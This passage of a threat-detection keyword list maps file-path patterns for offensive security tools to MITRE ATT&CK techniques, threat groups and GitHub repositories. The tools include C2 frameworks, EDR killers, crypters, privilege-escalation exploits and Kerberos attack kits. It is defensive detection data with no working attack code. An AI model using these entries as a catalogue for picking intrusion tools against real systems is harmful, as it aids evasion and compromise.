T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,1,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*/NetUser.cpp*,offensive_tool_keyword,cobaltstrike,Use windows api to add users which can be used when net is unavailable,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/lengjibo/NetUser,1,1,N/A,10,10,410,90,2021-09-29T14:22:09Z,2020-01-09T08:33:27Z -*/NetUser.exe*,offensive_tool_keyword,cobaltstrike,Use windows api to add users which can be used when net is unavailable,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/lengjibo/NetUser,1,1,N/A,10,10,410,90,2021-09-29T14:22:09Z,2020-01-09T08:33:27Z -*/netuserenum/*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*/network/bloodhound3*,offensive_tool_keyword,empire,Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/Network/PortScan/*,offensive_tool_keyword,cobaltstrike,Various Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rvrsh3ll/BOF_Collection,1,1,N/A,10,10,480,49,2022-10-16T13:57:18Z,2020-07-16T18:24:55Z -*/NewPhish.ps1*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/Newtonsoft.Json.dll*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*/nexpose-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/nfs-ls.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/nfs-showmount.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/nfs-statfs.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/nginxed-root.sh*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/nidem/kerberoast*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/nidem/kerberoast,1,1,N/A,N/A,10,1282,313,2022-12-31T17:17:28Z,2014-09-22T14:46:49Z -*/Nightmangle.git*,offensive_tool_keyword,Nightmangle,ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/1N73LL1G3NC3x/Nightmangle,1,1,N/A,10,10,72,10,2023-09-26T19:21:31Z,2023-09-26T18:25:23Z -*/nikto.git*,offensive_tool_keyword,nikto,Nikto web server scanner,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/sullo/nikto,1,1,N/A,N/A,10,7136,1096,2023-09-18T14:44:28Z,2012-11-24T04:24:29Z -*/nikto.pl*,offensive_tool_keyword,nikto,Nikto web scanner tool,T1210.001 - T1190 - T1046 - T1222,TA0007 - TA0002 - TA0001,N/A,N/A,Web Attacks,https://github.com/sullo/nikto,1,1,N/A,N/A,10,7136,1096,2023-09-18T14:44:28Z,2012-11-24T04:24:29Z -*/nikto.pl*,offensive_tool_keyword,nikto,Nikto web server scanner,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/sullo/nikto,1,1,N/A,N/A,10,7136,1096,2023-09-18T14:44:28Z,2012-11-24T04:24:29Z -*/NimBlackout*,offensive_tool_keyword,NimBlackout,Kill AV/EDR leveraging BYOVD attack,T1562.001 - T1055.001 - T1055.012,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Helixo32/NimBlackout,1,1,N/A,N/A,3,232,33,2023-07-11T07:32:50Z,2023-07-06T18:40:02Z -*/NimBlackout*,offensive_tool_keyword,NimBlackout,Kill AV/EDR leveraging BYOVD attack,T1562.001 - T1055.001 - T1055.012,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Helixo32/NimBlackout,1,0,N/A,N/A,3,232,33,2023-07-11T07:32:50Z,2023-07-06T18:40:02Z -*/NimBlackout*,offensive_tool_keyword,NimBlackout,Kill AV/EDR leveraging BYOVD attack,T1562.001 - T1055.001 - T1055.012,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Helixo32/NimBlackout,1,1,N/A,N/A,3,232,33,2023-07-11T07:32:50Z,2023-07-06T18:40:02Z -*/NimBlackout*,offensive_tool_keyword,NimBlackout,Kill AV/EDR leveraging BYOVD attack,T1562.001 - T1055.001 - T1055.012,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Helixo32/NimBlackout,1,0,N/A,N/A,3,232,33,2023-07-11T07:32:50Z,2023-07-06T18:40:02Z -*/NimBlackout*,offensive_tool_keyword,NimBlackout,Kill AV/EDR leveraging BYOVD attack,T1562.001 - T1055.001 - T1055.012,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Helixo32/NimBlackout,1,1,N/A,N/A,3,232,33,2023-07-11T07:32:50Z,2023-07-06T18:40:02Z -*/nimcrypt.nim*,offensive_tool_keyword,nimcrypt,Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project,T1027 - T1055 - T1099 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/icyguider/nimcrypt,1,1,N/A,N/A,1,83,5,2021-03-25T00:27:12Z,2021-03-24T17:51:52Z -*/nimcrypt/*,offensive_tool_keyword,nimcrypt,Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project,T1027 - T1055 - T1099 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/icyguider/nimcrypt,1,1,N/A,N/A,1,83,5,2021-03-25T00:27:12Z,2021-03-24T17:51:52Z -*/Nimcrypt2*,offensive_tool_keyword,Nimcrypt2,.NET PE & Raw Shellcode Packer/Loader Written in Nim,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/icyguider/Nimcrypt2,1,1,N/A,N/A,7,651,113,2023-01-20T22:07:15Z,2022-02-23T15:43:16Z -*/NimExec.git*,offensive_tool_keyword,NimExec,Fileless Command Execution for Lateral Movement in Nim,T1021.006 - T1059.005 - T1564.001,TA0008 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/frkngksl/NimExec,1,1,N/A,N/A,4,307,33,2023-06-23T11:07:20Z,2023-04-21T19:46:53Z -*/NimPlant.*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*/NimPlant/*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*/nimplants/*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*/ninja.crt*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*/Ninja.git*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*/ninja.key*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*/Ninja.py*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*/nipe.git,offensive_tool_keyword,nipe,An engine to make Tor Network your default gateway.,T1560 - T1573 - T1578,TA0005 - TA0007,N/A,N/A,Data Exfiltration,https://github.com/htrgouvea/nipe,1,0,N/A,N/A,10,1692,315,2023-09-22T12:35:29Z,2015-09-07T18:47:10Z -*/nipe.pl,offensive_tool_keyword,nipe,An engine to make Tor Network your default gateway.,T1560 - T1573 - T1578,TA0005 - TA0007,N/A,N/A,Data Exfiltration,https://github.com/htrgouvea/nipe,1,1,N/A,N/A,10,1692,315,2023-09-22T12:35:29Z,2015-09-07T18:47:10Z -*/nishang*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security. penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1059.001 - T1027 - T1210.001 - T1055.012 - T1047,TA0002 - TA0003 - TA0004 - TA0005,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*/nishang/*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*/nje-node-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/nje-pass-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/nmap.py*,offensive_tool_keyword,crackmapexec,parser nmap.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/nmap_smb_scan_all_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/nmap-nse-scripts*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,0,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*/nmap-scada*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,1,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*/nmap-vulners*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,1,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*/nntp-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Nofault.exe*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*/NoFilter.cpp*,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,1,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*/NoFilter.exe*,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,1,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*/NoFilter.git*,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,1,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*/NoFilter.sln*,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,1,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*/NoFilter.vcxproj*,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,1,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*/nopac.exe,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0004 ,N/A,N/A,Exploitation tools,https://github.com/ricardojba/noPac,1,0,N/A,N/A,1,34,5,2021-12-19T17:42:12Z,2021-12-13T18:51:31Z -*/No-PowerShell.cs*,offensive_tool_keyword,No-powershell,powershell script to C# (no-powershell),T1059.001 - T1027 - T1500,TA0002 - TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs,1,1,N/A,8,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*/No-PowerShell.exe*,offensive_tool_keyword,No-powershell,powershell script to C# (no-powershell),T1059.001 - T1027 - T1500,TA0002 - TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs,1,1,N/A,8,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*/nopowershell.git*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*/nopowershell/*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,1,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*/NoPowerShell/*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it 